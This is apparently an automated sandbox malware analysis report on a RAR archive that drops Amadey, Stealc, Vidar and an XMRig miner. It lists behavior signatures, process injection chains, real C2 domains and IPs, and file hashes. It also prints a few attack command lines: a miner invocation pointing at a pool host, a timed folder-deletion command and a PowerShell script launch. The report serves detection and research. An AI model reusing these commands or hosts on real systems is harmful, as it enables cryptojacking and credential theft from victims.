Malware Analysis Report

2024-09-11 16:05

Sample ID 240614-q3gg3axakn
Target files.rar
SHA256 c1ab245055a7fba415a767d00d2716deeb6b45027de02da058c08d40971c7aa0
Tags amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx
Score 10/10

Analysis Overview

Score 10/10

SHA256 c1ab245055a7fba415a767d00d2716deeb6b45027de02da058c08d40971c7aa0

Threat Level: Known bad

The file files.rar was found to be: Known bad.

Malicious Activity Summary

amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx

Stealc

Vidar

xmrig

Detect Vidar Stealer

Amadey

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Reads data files stored by FTP clients

Loads dropped DLL

Reads user/profile data of web browsers

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Modifies system certificate store

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported 2024-06-14 13:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-06-14 13:46

Reported 2024-06-14 13:51

Platform win10v2004-20240611-en

Max time kernel 226s

Max time network 227s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\files.rar

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer

Description | Indicator | Process | Target
6 matches, all with N/A in every column

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner

Description | Indicator | Process | Target
6 matches, all with N/A in every column

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Desktop\files\Setup.exe | N/A
N/A | N/A | C:\ProgramData\GHIJJEGDBF.exe | N/A
N/A | N/A | C:\ProgramData\AECAECFCAA.exe | N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description | Indicator | Process | Target
8 matches, all with N/A in every column

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A
File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A

Command and Scripting Interpreter: PowerShell

execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A

Delays execution with timeout.exe

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A

Modifies system certificate store

evasion spyware trojan

Description | Indicator | Process | Target
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob value omitted] | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\coml.au3 | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Desktop\files\Setup.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A
N/A | N/A | C:\ProgramData\GHIJJEGDBF.exe | N/A
N/A | N/A | C:\ProgramData\AECAECFCAA.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A
N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4368 wrote to memory of 4136 | N/A | C:\Users\Admin\Desktop\files\Setup.exe | C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 | N/A | C:\Users\Admin\Desktop\files\Setup.exe | C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 | N/A | C:\Users\Admin\Desktop\files\Setup.exe | C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 | N/A | C:\Users\Admin\Desktop\files\Setup.exe | C:\Windows\SysWOW64\netsh.exe
PID 4136 wrote to memory of 3820 | N/A | C:\Windows\SysWOW64\netsh.exe | C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 | N/A | C:\Windows\SysWOW64\netsh.exe | C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 | N/A | C:\Windows\SysWOW64\netsh.exe | C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 | N/A | C:\Windows\SysWOW64\netsh.exe | C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 | N/A | C:\Windows\SysWOW64\netsh.exe | C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 3820 wrote to memory of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 2544 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 3160 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\AECAECFCAA.exe
PID 3820 wrote to memory of 3160 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\AECAECFCAA.exe
PID 3820 wrote to memory of 3160 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\ProgramData\AECAECFCAA.exe
PID 2544 wrote to memory of 3876 | N/A | C:\ProgramData\GHIJJEGDBF.exe | C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 | N/A | C:\ProgramData\GHIJJEGDBF.exe | C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 | N/A | C:\ProgramData\GHIJJEGDBF.exe | C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 | N/A | C:\ProgramData\AECAECFCAA.exe | C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 | N/A | C:\ProgramData\AECAECFCAA.exe | C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 | N/A | C:\ProgramData\AECAECFCAA.exe | C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 | N/A | C:\ProgramData\GHIJJEGDBF.exe | C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 | N/A | C:\ProgramData\AECAECFCAA.exe | C:\Windows\SysWOW64\ftp.exe
PID 3820 wrote to memory of 4308 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\Windows\SysWOW64\cmd.exe
PID 3820 wrote to memory of 4308 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\Windows\SysWOW64\cmd.exe
PID 3820 wrote to memory of 4308 | N/A | C:\Users\Admin\AppData\Local\Temp\coml.au3 | C:\Windows\SysWOW64\cmd.exe
PID 4308 wrote to memory of 4104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4308 wrote to memory of 4104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 4308 wrote to memory of 4104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 2904 wrote to memory of 1212 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2904 wrote to memory of 1212 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3876 wrote to memory of 3540 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 3540 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 3540 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\SysWOW64\explorer.exe
PID 2904 wrote to memory of 1212 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2904 wrote to memory of 1212 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3876 wrote to memory of 3540 | N/A | C:\Windows\SysWOW64\ftp.exe | C:\Windows\SysWOW64\explorer.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 3540 wrote to memory of 4668 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4668 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4668 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\files.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\files.rar"

C:\Users\Admin\Desktop\files\Setup.exe

"C:\Users\Admin\Desktop\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\coml.au3

C:\Users\Admin\AppData\Local\Temp\coml.au3

C:\ProgramData\GHIJJEGDBF.exe

"C:\ProgramData\GHIJJEGDBF.exe"

C:\ProgramData\AECAECFCAA.exe

"C:\ProgramData\AECAECFCAA.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAEBGCFIEHCF" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 131.253.33.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 237.33.253.131.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp
NL | 23.62.61.75:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | feeldog.xyz | udp
US | 104.21.13.222:443 | feeldog.xyz | tcp
US | 52.111.227.14:443 | - | tcp
US | 8.8.8.8:53 | 222.13.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | t.me | udp
NL | 149.154.167.99:443 | t.me | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp
US | 8.8.8.8:53 | 58.251.201.195.in-addr.arpa | udp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
US | 8.8.8.8:53 | businessdownloads.ltd | udp
US | 104.21.16.123:443 | businessdownloads.ltd | tcp
US | 8.8.8.8:53 | 123.16.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
US | 8.8.8.8:53 | i.imgur.com | udp
US | 199.232.192.193:443 | i.imgur.com | tcp
US | 8.8.8.8:53 | 193.192.232.199.in-addr.arpa | udp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
DE | 195.201.251.58:9000 | 195.201.251.58 | tcp
US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp
FI | 135.181.22.88:80 | 135.181.22.88 | tcp
US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp
FI | 65.109.127.181:3333 | - | tcp
FI | 65.109.127.181:3333 | - | tcp
US | 8.8.8.8:53 | proresupdate.com | udp
US | 45.152.112.146:80 | proresupdate.com | tcp
US | 8.8.8.8:53 | contur2fa.recipeupdates.rest | udp
US | 172.67.197.250:443 | contur2fa.recipeupdates.rest | tcp
US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp
US | 8.8.8.8:53 | 250.197.67.172.in-addr.arpa | udp
US | 172.67.197.250:443 | contur2fa.recipeupdates.rest | tcp
FI | 65.109.127.181:3333 | - | tcp
FI | 65.109.127.181:3333 | - | tcp
FI | 65.109.127.181:3333 | - | tcp
N/A | 224.0.0.251:5353 | - | udp
FI | 65.109.127.181:3333 | - | tcp
FI | 65.109.127.181:3333 | - | tcp

Files

C:\Users\Admin\Desktop\files\Setup.exe

MD5 c637e5ecf625b72f4bef9d28cd81d612
SHA1 a2c1329d290e508ee9fd0eb81e7f25d57e450f8c
SHA256 111c56593668be63e1e0c79a2d33d9e2d49cdf0c5100663c72045bc6b76e9fe6
SHA512 727d78bab4fab3674eec92ca5f07df6a0095ab3b973dd227c599c70e8493592bb53bb9208cc6270713283ef0065acfad3203ddcf4dcb6d43f8727f09ceaaf2e4

C:\Users\Admin\Desktop\files\msvcp140.dll

MD5 1ba6d1cf0508775096f9e121a24e5863
SHA1 df552810d779476610da3c8b956cc921ed6c91ae
SHA256 74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA512 9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

C:\Users\Admin\Desktop\files\vcruntime140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

C:\Users\Admin\Desktop\files\vcruntime140_1.dll

MD5 cf0a1c4776ffe23ada5e570fc36e39fe
SHA1 2050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA256 6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512 d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

C:\Users\Admin\Desktop\files\flutter_windows.dll

MD5 b240e55a02ba690ae0c07b97eb7a78ed
SHA1 829ac8c313f253eeeec33d8bd9f4fe8b1c8e2cc8
SHA256 02e83afa12741cc245c2d3e8754beded58efc3c5173987910d84541f098d6ae9
SHA512 76fcb731389ce5a0d41b20395c72baca5aa128b591e2b56a8f311cd65983623342f129a824acddd98c74d54bf45ba9b360ea5c37b23c8204c1febef9d79dba3b

C:\Users\Admin\Desktop\files\covalency.dwg

MD5 5592c01b512749d9dce7c6d5861ee385
SHA1 ad19e91e76aadda703ae31e7bcc7602c5f67fc00
SHA256 77c5dfbc5c124b1e8acb65db529b5c2ef672aa5eb39d8d1ee89325db16efa6d7
SHA512 6811ca9ffe9fdbd7bf8ed56ab95f39b2d125054578105c1561b9c428960f771d31cc49367e43a86648f04e6b4bd3cd3ffbd2b403c89a8da5574265cd48c6b855

C:\Users\Admin\Desktop\files\tray_manager_plugin.dll

MD5 65dcbb76cbb2bbb1684186f1520e888d
SHA1 25d656c1cb3c814776779bc53e0e2b937d8441f4
SHA256 9c7e0de576932c8b2149849c96f3493bcae215f6db5996dbaf5ae1788697e8f0
SHA512 e351547e551943db0267828e283797c81b593ec303cee4d4447226e86927acac93b87226e79e1a913a1ec397b4183b7ee81a2af8764f71d7fa73c41bb102d9ca

C:\Users\Admin\Desktop\files\windows_single_instance_plugin.dll

MD5 00c451a17ddfcd810086fb2ad794125a
SHA1 feba77a0ca91f828099a3444a93ff11b6ce40fe5
SHA256 f1430479210c19093d76435e5826e3578420933248b51164e11f0992f77ed1f1
SHA512 6ea4d2556e0b82d017cde2a3c5c9b2881daca6b5af0e92cd10be886047eb6303085244ac1bb764e96595b3ca448504591c976dfefbffca8c6cbabe28f81e78c3

C:\Users\Admin\Desktop\files\url_launcher_windows_plugin.dll

MD5 7e6a40e0083af22b186b662553d679fc
SHA1 b74c38d1d33004fb27b1df8003ecd4b87a5739c1
SHA256 578323ec0b492e72987778af3811cd00b71171b1e84b92e720964543f8f3a183
SHA512 3ac74e807bddffc2965cb3878a51e5c7c3b5eab2dcf8bc1ffaa41a56e20460cd01ff6b9a00d78e1aa021f5b9c38ba4f4726d37bf42749da4fa208e3f8985c114

C:\Users\Admin\Desktop\files\flutter_desktop_sleep_plugin.dll

MD5 ae8bbd77a997d05c06e459f0f3faa5af
SHA1 843ae129debba252eaebce0459adccddc1315826
SHA256 9600697c57da5a1411a227eb5fc135f20d0ea292f458290d15fb959c1f75537e
SHA512 13067ed69244f94206e642b408143409b48fb976221dbbbbdd86f0b357a8b7b0cad334a6259751a718f2149e183d322bb8b03e26abff2cdcac2826a551e27d2f

C:\Users\Admin\Desktop\files\hermit.txt

MD5 11a43b5161b53ce2f30dde8d872a6ed9
SHA1 a228ba7eacae17c6a5d8ed8d5f4554ed34705fcc
SHA256 5dd1ab29e1689994bbcae99c892cb98316e755623b747a783a2e43e56d58fa68
SHA512 c0d391c4fa7a6f653c85e1716584a31ac7f3d3975ea5c8cc0f23753c48d259119d34b725981ddbb3b74b20f5f06394eb175d7c6a297dd4f6deaf907c4e696baf

memory/4368-96-0x00007FFAF19B0000-0x00007FFAF1B22000-memory.dmp

memory/4368-107-0x00007FFAF19B0000-0x00007FFAF1B22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a79c4c8b

MD5 ef069a8842295778f14e496b1688cb28
SHA1 db5a1c7cf305a71a05a4c86e6455763ce394da8c
SHA256 3981d211a9aa782eff3e689ad04b57f6f7c14b3e2e397ac733013cc3d1bccb53
SHA512 286d1d9429e18bce08d4dd2dd4d1562beee3b80d31c23481c0c21139bd07fd0b1882f9e7913bf39ca238ef056ec189a5424b336fbedc276e312be116de269aa5

memory/4136-110-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\coml.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/3820-116-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-118-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-119-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-123-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\BAEBGCFIEHCF\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\BAEBGCFIEHCF\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/3820-191-0x0000000001030000-0x000000000177C000-memory.dmp

C:\ProgramData\GHIJJEGDBF.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2544-205-0x0000000000570000-0x0000000000A83000-memory.dmp

C:\ProgramData\AECAECFCAA.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/3160-220-0x00000000006A0000-0x00000000008E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\55769726

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2544-226-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/3160-228-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/2544-229-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\55b01311

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/3160-230-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-234-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3820-235-0x0000000001030000-0x000000000177C000-memory.dmp

memory/2544-236-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58386f15

MD5 892b67fa0e0f7eb0293fc8ce61155e0b
SHA1 8fd55c32e44dea8165c8263f875f04d6e83711f0
SHA256 cbc0cb3be1af3785b77e7cbf807a5757dc777780daffa25e296df65b59d4e17e
